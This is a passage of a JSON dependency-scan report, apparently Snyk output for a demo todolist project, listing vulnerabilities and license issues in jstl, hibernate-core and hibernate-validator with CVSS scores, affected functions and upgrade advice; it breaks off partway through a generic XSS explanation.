false, + "creationTime": "2017-02-22T07:28:19.341000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-02-27T16:13:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "javax.servlet", + "artifactId": "jstl" + }, + "publicationTime": "2015-02-27T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.017447Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "javax.servlet:jstl", + "version": "1.2" + }, + { + "id": "snyk:lic:maven:javax.servlet:jstl:CDDL-1.0", + 
"type": "license", + "title": "CDDL-1.0 license", + "semver": { + "vulnerable": [ + "[1.2,)" + ] + }, + "license": "CDDL-1.0", + "language": "java", + "description": "CDDL-1.0 license", + "packageName": "javax.servlet:jstl", + "creationTime": "2024-06-18T08:06:13.191Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T08:06:13.191Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "javax.servlet:jstl", + "version": "1.2" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-1041788", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.4.24.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "5.4.24.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", + "className": "SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Delete.java", + "className": "Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Insert.java", + "className": "Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/InsertSelect.java", + "className": "InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + 
"functionId": { + "filePath": "org/hibernate/sql/QuerySelect.java", + "className": "QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Select.java", + "className": "Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/SimpleSelect.java", + "className": "SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Update.java", + "className": "Update", + "functionName": "toStatementString" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", + "title": "GitHub Commit" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2020-25638", + "title": "Redhat CVE Details" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:14.190706Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "type": 
"secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", + "epssDetails": { + "percentile": "0.72103", + "probability": "0.00352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25638" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-11-19T16:51:52.251545Z", + "functions_new": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Insert", + "functionName": "toStatementString" + } + }, + { + 
"version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Update", + "functionName": "toStatementString" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-11-19T16:51:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-11-19T16:57:14.572204Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.086548Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-584563", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Gail Badner" + ], + "semver": { + "vulnerable": [ + "[,5.3.18.Final)", + "[5.4.0.Final, 5.4.18.Final)" + ] + }, + "exploit": "Not Defined", + 
"fixedIn": [ + "5.3.18.Final", + "5.4.18.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", + "className": "LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/pull/3438", + "title": "GitHub Pull Request" + }, + { + "url": "https://hibernate.atlassian.net/browse/HHH-14077", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:47.723462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "description": "## 
Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", + "epssDetails": { + "percentile": "0.42797", + "probability": "0.00104", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14900" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-07-15T13:53:15.331818Z", + "functions_new": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-18T13:46:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-07-15T16:40:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.262550Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.3.0.CR1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-core", + "creationTime": "2024-06-18T19:09:16.096Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T19:09:16.096Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-30098", + "title": "JSM bypass via ReflectionHelper", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[4.1.0.Beta1, 4.3.2.Final)", + "[5.0.0.Final,5.1.2.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "4.3.2.Final", + "5.1.2.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726", + 
"title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e", + "title": "GitHub Commit" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-912", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/CVE-2014-3558", + "title": "Redhat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:48.734535Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + 
"type": "secondary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to JSM bypass via ReflectionHelper. ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n", + 
"epssDetails": { + "percentile": "0.70800", + "probability": "0.00319", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3558" + ], + "CWE": [ + "CWE-592" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2016-12-25T16:51:53Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2014-07-17T16:51:53Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2014-07-17T16:51:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:45.778673Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [ + false, + "org.hibernate:hibernate-validator@6.0.23.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-568162", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Alvaro Muñoz" + ], + "semver": { + "vulnerable": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "6.0.19.Final", + "6.1.3.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/engine/ValidatorImpl.java", + "className": "ValidatorImpl", + "functionName": "validate" + 
} + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/pull/1071", + "title": "GitHub PR" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-1758", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1805501", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:37.379564Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. 
This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n## References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n", + "epssDetails": { + "percentile": "0.49937", + "probability": "0.00139", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10693" + ], + "CWE": [ + "CWE-20" + ], + "GHSA": [ + "GHSA-rmrm-75hp-phr2" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-05T12:05:58.541980Z", + "functions_new": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.engine.ValidatorImpl", + "functionName": "validate" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-05T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-05-05T16:32:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.490090Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [ + false, + "org.hibernate:hibernate-validator@6.0.23.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": 
"org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-569100", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "6.0.18.Final", + "6.1.0.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/constraintvalidators/hv/SafeHtmlValidator.java", + "className": "SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee", + "title": "GitHub Commit" + }, + { + "url": "https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/", + "title": "Hibernator Security Release Blog" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + 
"cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:47.749976Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n## Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. 
The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n### Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. 
